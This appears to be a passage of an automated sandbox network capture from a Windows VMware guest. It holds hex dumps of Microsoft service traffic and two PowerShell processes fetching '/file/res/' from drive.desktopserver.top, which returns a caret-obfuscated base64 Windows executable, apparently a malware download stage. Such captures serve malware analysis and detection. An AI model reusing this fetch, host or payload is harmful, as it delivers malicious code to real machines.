                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                          MS-CorrelationId: ed02efd6-84c1-4556-85c6-1e7dd1324dab
                                                                                                                                          MS-RequestId: 71ce9f13-0383-43c4-a246-71a51c13a420
                                                                                                                                          MS-CV: W1XQhIIMDUC3pDhv.0
                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:26 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 24490
                                                                                                                                          2024-09-30 16:58:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                          2024-09-30 16:58:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          18192.168.2.54975240.113.103.199443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 6b 2b 2b 77 46 4f 42 4a 55 69 49 61 4d 72 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 39 39 31 63 62 37 32 64 65 38 31 32 35 65 0d 0a 0d 0a
                                                                                                                                          Data Ascii: CNT 1 CON 305MS-CV: 9k++wFOBJUiIaMrb.1Context: e0991cb72de8125e
                                                                                                                                          2024-09-30 16:58:30 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                          2024-09-30 16:58:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 6b 2b 2b 77 46 4f 42 4a 55 69 49 61 4d 72 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 39 39 31 63 62 37 32 64 65 38 31 32 35 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 66 43 6e 7a 53 7a 79 76 51 63 39 2b 49 50 79 57 64 4a 62 61 32 41 52 75 2b 78 4b 55 37 73 39 53 69 79 34 4c 50 5a 78 71 64 79 73 71 2b 6a 73 55 44 32 63 50 4f 43 4e 69 68 79 51 49 69 5a 52 6a 37 66 59 7a 4d 6b 4c 38 61 34 54 51 4d 38 2f 32 4e 49 41 58 58 48 73 74 2f 38 59 4d 4b 66 6b 31 66 61 34 34 47 4a 76 4d 66 4a 46 4e
                                                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9k++wFOBJUiIaMrb.2Context: e0991cb72de8125e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATfCnzSzyvQc9+IPyWdJba2ARu+xKU7s9Siy4LPZxqdysq+jsUD2cPOCNihyQIiZRj7fYzMkL8a4TQM8/2NIAXXHst/8YMKfk1fa44GJvMfJFN
                                                                                                                                          2024-09-30 16:58:30 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 39 6b 2b 2b 77 46 4f 42 4a 55 69 49 61 4d 72 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 39 39 31 63 62 37 32 64 65 38 31 32 35 65 0d 0a 0d 0a
                                                                                                                                          Data Ascii: BND 3 CON\QOS 56MS-CV: 9k++wFOBJUiIaMrb.3Context: e0991cb72de8125e
                                                                                                                                          2024-09-30 16:58:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                                                          2024-09-30 16:58:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 64 75 2b 6b 71 66 57 30 64 6b 75 58 58 5a 45 52 76 38 63 72 57 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                          Data Ascii: MS-CV: du+kqfW0dkuXXZERv8crWw.0Payload parsing failed.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.549757104.21.92.1894438544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:35 UTC177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:36 UTC628INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:36 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsVJM0ISSCRpdKNk%2BlYyWaY2Sbvk0U%2F%2FFt5%2BayXVSfA9kLBCVRuK9P3P2JGuxGqen1M5VQ34MKO0V9VOxXVEa9WpQTUOrIDOP3%2BvUu1TBQxtOR2i9kghO6tbY1QbVNOE95t0eJQm3XsrjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c2376c0a7286-EWR
                                                                                                                                          2024-09-30 16:58:36 UTC741INData Raw: 34 37 37 32 0d 0a 54 56 71 51 41 5e 41 4d 41 41 41 5e 41 45 41 41 41 5e 41 2f 2f 38 41 5e 41 4c 67 41 41 5e 41 41 41 41 41 5e 41 41 51 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 67 41 41 41 41 5e 41 34 66 75 67 5e 34 41 74 41 6e 5e 4e 49 62 67 42 5e 54 4d 30 68 56 5e 47 68 70 63 79 5e 42 77 63 6d 39 5e 6e 63 6d 46 74 5e 49 47 4e 68 62 5e 6d 35 76 64 43 5e 42 69 5a 53 42 5e 79 64 57 34 67 5e 61 57 34 67 52 5e 45 39 54 49 47 5e 31 76 5a 47 55 5e 75 44 51 30 4b 5e 4a 41 41 41 41 5e 41 41 41 41 41 5e 42 51 52 51 41 5e 41 54 41 45 44 5e 41 45 6d 6b 38 5e 6d 59 41 41 41 5e 41 41 41 41 41 5e 41 41 4f 41 41 5e 44 69 45 4c 41 5e 54 41 41
                                                                                                                                          Data Ascii: 4772TVqQA^AMAAA^AEAAA^A//8A^ALgAA^AAAAA^AAQAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^gAAAA^A4fug^4AtAn^NIbgB^TM0hV^Ghpcy^Bwcm9^ncmFt^IGNhb^m5vdC^BiZSB^ydW4g^aW4gR^E9TIG^1vZGU^uDQ0K^JAAAA^AAAAA^BQRQA^ATAED^AEmk8^mYAAA^AAAAA^AAOAA^DiELA^TAA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 47 39 5e 6a 41 41 41 4d 5e 41 41 41 41 41 5e 45 41 49 41 41 5e 41 43 41 41 41 5e 41 37 67 63 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 51 41 41 41 5e 51 67 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 43 41 42 5e 67 67 41 41 41 5e 41 41 41 45 67 5e 41 41 41 41 43 5e 41 41 55 41 6d 5e 45 55 46 41 4e 5e 68 49 41 67 41 5e 42 41 41 41 41 5e 41 41 41 41 41 5e 48 43 4f 42 77 5e 42 6e 64 41 41 5e 41 6a 51 55 49 5e 41 49 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 42 5e 4d 77 41 77 41 5e 46 41 51 41 41 5e 41 51 41 41 45 5e 53 73 46 4b 4f 5e 6a 4e 4a 57 41 5e 67 41 67 41 41 5e 41 50 34 4f 41 5e
                                                                                                                                          Data Ascii: G9^jAAAM^AAAAA^EAIAA^ACAAA^A7gcA^AAAAA^AAAAA^AAAAA^AQAAA^QgAAA^AAAAA^AAAAA^AAAAA^AACAB^ggAAA^AAAEg^AAAAC^AAUAm^EUFAN^hIAgA^BAAAA^AAAAA^HCOBw^BndAA^AjQUI^AIAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAB^MwAwA^FAQAA^AQAAE^SsFKO^jNJWA^gAgAA^AP4OA^
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 5e 6f 71 77 45 41 5e 42 69 55 6d 67 5e 41 51 41 41 41 5e 51 67 42 67 41 5e 41 41 44 67 7a 5e 2f 2f 2f 2f 49 5e 49 77 41 41 41 5e 41 6f 45 51 41 5e 41 42 69 55 6d 5e 67 41 59 41 41 5e 41 51 67 42 41 5e 41 41 41 44 67 5e 59 2f 2f 2f 2f 5e 66 6d 63 43 41 5e 41 51 6f 42 41 5e 67 41 42 69 55 5e 6d 49 4b 4d 41 5e 41 41 41 6f 45 5e 51 41 41 42 69 5e 55 6d 66 6d 67 5e 43 41 41 51 6f 5e 43 41 67 41 42 5e 69 68 67 41 67 5e 41 47 66 6d 6b 5e 43 41 41 51 6f 5e 44 41 67 41 42 5e 69 55 6d 49 4b 5e 59 41 41 41 41 5e 6f 45 51 41 41 5e 42 69 43 70 41 5e 41 41 41 4b 42 5e 45 41 41 41 59 5e 6c 4a 6e 35 71 5e 41 67 41 45 4b 5e 42 41 49 41 41 5e 61 41 42 77 41 5e 41 42 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 47 51 49 5e 41 42 44 6d 73 5e 2f 76 2f 2f 4a 5e 69
                                                                                                                                          Data Ascii: A^oqwEA^BiUmg^AQAAA^QgBgA^AADgz^////I^IwAAA^AoEQA^ABiUm^gAYAA^AQgBA^AAADg^Y////^fmcCA^AQoBA^gABiU^mIKMA^AAAoE^QAABi^Umfmg^CAAQo^CAgAB^ihgAg^AGfmk^CAAQo^DAgAB^iUmIK^YAAAA^oEQAA^BiCpA^AAAKB^EAAAY^lJn5q^AgAEK^BAIAA^aABwA^ABCAA^AAAAf^gYCAA^R7GQI^ABDms^/v//J^i
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 5e 46 42 41 41 41 5e 41 46 38 41 41 5e 41 41 46 41 41 5e 41 41 65 67 41 5e 41 41 42 59 41 5e 41 41 41 34 57 5e 67 41 41 41 48 5e 4d 53 41 41 41 5e 4b 45 77 49 67 5e 41 67 41 41 41 5e 44 6a 56 2f 2f 5e 2f 2f 45 51 41 5e 52 41 48 35 76 5e 41 67 41 45 4b 5e 43 51 49 41 41 5e 59 6c 4a 68 45 5e 41 66 6e 41 43 5e 41 41 51 6f 4b 5e 41 67 41 42 69 5e 55 6d 66 6e 45 5e 43 41 41 51 6f 5e 4c 41 67 41 42 5e 68 4d 4a 49 41 5e 45 41 41 41 42 5e 2b 42 67 49 41 5e 42 48 73 65 41 5e 67 41 45 4f 5a 5e 66 2f 2f 2f 38 5e 6d 49 41 45 41 5e 41 41 41 34 6a 5e 50 2f 2f 2f 78 5e 45 41 66 67 73 5e 41 41 41 52 2b 5e 62 67 49 41 42 5e 43 67 67 43 41 5e 41 47 49 41 4d 5e 41 41 41 41 34 5e 63 66 2f 2f 2f 5e 77 41 52 41 68 5e 45 4a 46 69 69 5e 66 41 51 41 47 5e 63 78 4d 41 41 5e 41 6f
                                                                                                                                          Data Ascii: ^FBAAA^AF8AA^AAFAA^AAegA^AABYA^AAA4W^gAAAH^MSAAA^KEwIg^AgAAA^DjV//^//EQA^RAH5v^AgAEK^CQIAA^YlJhE^AfnAC^AAQoK^AgABi^UmfnE^CAAQo^LAgAB^hMJIA^EAAAB^+BgIA^BHseA^gAEOZ^f///8^mIAEA^AAA4j^P///x^EAfgs^AAAR+^bgIAB^CggCA^AGIAM^AAAA4^cf///^wARAh^EJFii^fAQAG^cxMAA^Ao
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 42 44 6f 50 5e 41 41 41 41 4a 5e 69 41 41 41 41 5e 41 41 4f 41 51 5e 41 41 41 44 2b 5e 44 41 34 41 52 5e 51 4d 41 41 41 5e 41 46 41 41 41 5e 41 47 77 41 41 5e 41 45 51 41 41 5e 41 41 34 41 41 5e 41 41 41 42 45 5e 41 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 43 41 41 41 5e 41 4f 4e 54 2f 5e 2f 2f 38 62 52 5e 51 45 41 41 41 5e 44 32 2f 2f 2f 5e 2f 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 73 53 41 67 41 5e 45 4f 62 62 2f 5e 2f 2f 38 6d 49 5e 41 41 41 41 41 5e 41 34 71 2f 2f 5e 2f 2f 39 77 67 5e 41 41 41 41 41 5e 48 34 47 41 67 5e 41 45 65 79 67 5e 43 41 41 51 35 5e 32 2f 76 2f 2f 5e 79 59 67 41 41 5e 41 41 41 44 6a 5e 51 2b 2f 2f 2f 5e 63 78 55 41 41 5e 41 6f 54 41 43 5e 41 42 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 4a 5e 67 49 41
                                                                                                                                          Data Ascii: ABDoP^AAAAJ^iAAAA^AAOAQ^AAAD+^DA4AR^QMAAA^AFAAA^AGwAA^AEQAA^AA4AA^AAABE^AfnMC^AAQoN^AgABi^ACAAA^AONT/^//8bR^QEAAA^D2///^/IAAA^AAB+B^gIABH^sSAgA^EObb/^//8mI^AAAAA^A4q//^//9wg^AAAAA^H4GAg^AEeyg^CAAQ5^2/v//^yYgAA^AAADj^Q+///^cxUAA^AoTAC^ABAAA^AfgYC^AAR7J^gIA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 42 44 71 34 5e 2f 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 4b 33 5e 2f 2f 2f 38 63 5e 52 51 45 41 41 5e 41 44 32 2f 2f 5e 2f 2f 49 41 45 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 76 7a 41 51 5e 41 45 4f 59 2f 5e 2f 2f 2f 38 6d 5e 49 41 51 41 41 5e 41 41 34 68 50 5e 2f 2f 2f 78 45 5e 49 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 43 5e 41 49 41 42 44 5e 70 6b 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 46 6e 2f 2f 2f 5e 2f 63 45 51 4d 5e 36 53 41 41 41 5e 41 43 41 43 41 5e 41 41 41 4f 41 5e 51 41 41 41 44 5e 2b 44 41 6f 41 5e 52 51 4d 41 41 5e 41 41 70 41 41 5e 41 41 56 41 41 5e 41 41 41 55 41 5e 41 41 41 34 4a 5e 41 41 41 41 44 5e 68 4b 41 41 41 5e 41 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42
                                                                                                                                          Data Ascii: BDq4^////J^iABAA^AAOK3^///8c^RQEAA^AD2//^//IAE^AAAB+^BgIAB^HvzAQ^AEOY/^///8m^IAQAA^AA4hP^///xE^IfnMC^AAQoN^AgABi^ADAAA^AfgYC^AAR7C^AIABD^pk///^/JiAC^AAAAO^Fn///^/cEQM^6SAAA^ACACA^AAAOA^QAAAD^+DAoA^RQMAA^AApAA^AAVAA^AAAUA^AAA4J^AAAAD^hKAAA^AIAAA^AAB+B^gIAB
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 6a 67 41 5e 41 41 41 41 41 5e 69 67 59 41 41 5e 41 4b 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 45 41 67 5e 41 45 4f 52 51 5e 41 41 41 41 6d 5e 49 41 41 41 41 5e 41 41 34 43 51 5e 41 41 41 44 6a 5e 43 2f 2f 2f 2f 5e 2f 67 77 41 41 5e 45 55 43 41 41 5e 41 41 42 51 41 5e 41 41 43 73 41 5e 41 41 41 34 41 5e 41 41 41 41 41 5e 49 44 66 51 30 5e 41 41 41 51 67 5e 41 51 41 41 41 5e 48 34 47 41 67 5e 41 45 65 78 77 5e 43 41 41 51 35 5e 30 2f 2f 2f 2f 5e 79 59 67 41 51 5e 41 41 41 44 6a 5e 49 2f 2f 2f 2f 5e 4b 67 41 41 4f 5e 69 73 46 4b 47 5e 47 58 56 30 63 5e 43 65 77 30 41 5e 41 41 51 71 41 5e 44 59 72 42 53 5e 68 77 2f 32 46 5e 50 4b 43 63 41 5e 41 41 59 71 41 5e 41 41 36 4b 77 5e 55 6f 6e 51 39 5e 5a 53 51 41 6f 5e 70 41 4d 41 42 5e 69 6f 41 51 69
                                                                                                                                          Data Ascii: jgA^AAAAA^igYAA^AKIAA^AAAB+^BgIAB^HtEAg^AEORQ^AAAAm^IAAAA^AA4CQ^AAADj^C////^/gwAA^EUCAA^AABQA^AACsA^AAA4A^AAAAA^IDfQ0^AAAQg^AQAAA^H4GAg^AEexw^CAAQ5^0////^yYgAQ^AAADj^I////^KgAAO^isFKG^GXV0c^Cew0A^AAQqA^DYrBS^hw/2F^PKCcA^AAYqA^AA6Kw^UonQ9^ZSQAo^pAMAB^ioAQi
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 4b 5e 41 41 41 41 4f 5e 48 37 2f 2f 2f 5e 38 52 41 43 67 5e 77 41 41 41 47 5e 4a 53 59 54 41 5e 53 41 46 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 4b 51 49 41 42 5e 44 70 66 2f 2f 5e 2f 2f 4a 69 41 5e 46 41 41 41 41 5e 4f 46 54 2f 2f 5e 2f 38 62 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 41 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 67 41 67 41 45 5e 4f 54 62 2f 2f 5e 2f 38 6d 49 41 5e 41 41 41 41 41 5e 34 4b 2f 2f 2f 5e 2f 78 45 41 45 5e 51 46 2b 67 41 5e 49 41 42 43 68 5e 6f 43 41 41 47 5e 4a 53 59 54 42 5e 43 41 43 41 41 5e 41 41 2f 67 34 5e 43 41 44 67 48 5e 2f 2f 2f 2f 30 5e 43 73 41 41 41 5e 59 6d 49 41 59 5e 41 41 41 41 34 5e 2b 2f 37 2f 2f 5e 7a 6a 4c 2f 2f 5e 2f 2f 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 6c 41 67 5e
                                                                                                                                          Data Ascii: AK^AAAAO^H7///^8RACg^wAAAG^JSYTA^SAFAA^AAfgY^CAAR7^KQIAB^Dpf//^//JiA^FAAAA^OFT//^/8bRQ^EAAAD^2////^IAAAA^AB+Bg^IABHt^gAgAE^OTb//^/8mIA^AAAAA^4K///^/xEAE^QF+gA^IABCh^oCAAG^JSYTB^CACAA^AA/g4^CADgH^////0^CsAAA^YmIAY^AAAA4^+/7//^zjL//^//IAA^AAAB+^BgIAB^HtlAg^
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 5e 42 69 67 31 41 5e 41 41 47 4a 53 5e 59 36 58 41 45 5e 41 41 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 44 51 49 5e 41 42 44 6c 53 5e 2f 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 45 66 5e 2f 2f 2f 38 34 5e 35 51 41 41 41 5e 43 41 41 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 43 67 49 41 42 5e 44 6b 75 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 43 50 2f 2f 5e 2f 2f 64 65 50 5e 2f 2f 2f 79 41 5e 46 41 41 41 41 5e 4f 42 54 2f 2f 5e 2f 38 63 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 51 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 66 41 67 41 45 5e 4f 66 62 2b 2f 5e 2f 38 6d 49 41 5e 6f 41 41 41 41 5e 34 36 2f 37 2f 5e 2f 78 45 44 46 5e 31 67 54 41 79 5e 41 4e 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 2b 5e 51 45 41 42 44 5e 6e
                                                                                                                                          Data Ascii: A^Big1A^AAGJS^Y6XAE^AACAA^AAAAf^gYCAA^R7DQI^ABDlS^////J^iABAA^AAOEf^///84^5QAAA^CAAAA^AAfgY^CAAR7^CgIAB^Dku//^//JiA^AAAAA^OCP//^//deP^///yA^FAAAA^OBT//^/8cRQ^EAAAD^2////^IAQAA^AB+Bg^IABHt^fAgAE^Ofb+/^/8mIA^oAAAA^46/7/^/xEDF^1gTAy^ANAAA^AfgYC^AAR7+^QEABD^n
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 5e 4f 67 49 41 42 5e 44 72 54 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 4d 6a 2f 2f 5e 2f 38 71 41 41 5e 41 54 4d 41 51 5e 41 36 41 41 41 5e 41 41 67 41 41 5e 42 45 72 42 53 5e 69 42 63 68 51 5e 37 49 41 49 41 5e 41 41 44 2b 44 5e 67 45 41 4f 41 5e 41 41 41 41 44 5e 2b 44 41 45 41 5e 52 51 55 41 41 5e 41 41 46 41 41 5e 41 41 6a 77 41 5e 41 41 45 6b 41 5e 41 41 42 37 41 5e 41 41 41 48 41 5e 41 41 41 44 67 5e 41 41 41 41 41 5e 45 67 41 65 4b 5e 45 4d 41 41 41 5e 5a 39 46 77 41 5e 41 42 43 41 45 5e 41 41 41 41 4f 5e 4d 76 2f 2f 2f 5e 38 53 41 48 77 5e 59 41 41 41 45 5e 45 67 41 6f 41 5e 51 41 41 4b 79 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 37 5e 51 45 41 42 44 5e 6d 70 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 4a 37 2f 2f 2f 5e 38 53
                                                                                                                                          Data Ascii: ^OgIAB^DrT//^//JiA^AAAAA^OMj//^/8qAA^ATMAQ^A6AAA^AAgAA^BErBS^iBchQ^7IAIA^AAD+D^gEAOA^AAAAD^+DAEA^RQUAA^AAFAA^AAjwA^AAEkA^AAB7A^AAAHA^AAADg^AAAAA^EgAeK^EMAAA^Z9FwA^ABCAE^AAAAO^Mv///^8SAHw^YAAAE^EgAoA^QAAKy^ADAAA^AfgYC^AAR77^QEABD^mp///^/JiAC^AAAAO^J7///^8S


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.549758104.21.92.1894439196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:35 UTC177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:36 UTC622INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:36 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KxI2D0h7ntbkD7wo%2BNakiRCTr9iPyL3Up9CyQ7gjn9hNxc300odMu0IEiyNhvNEbNz9se0iJarmojsTjAxDATHG1pH8NVKWxjg9SOpzCg2CBx02Vv1dOUXauv8SZWzCyNQLk3f96Rw%2B9ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c2378b04c3f3-EWR
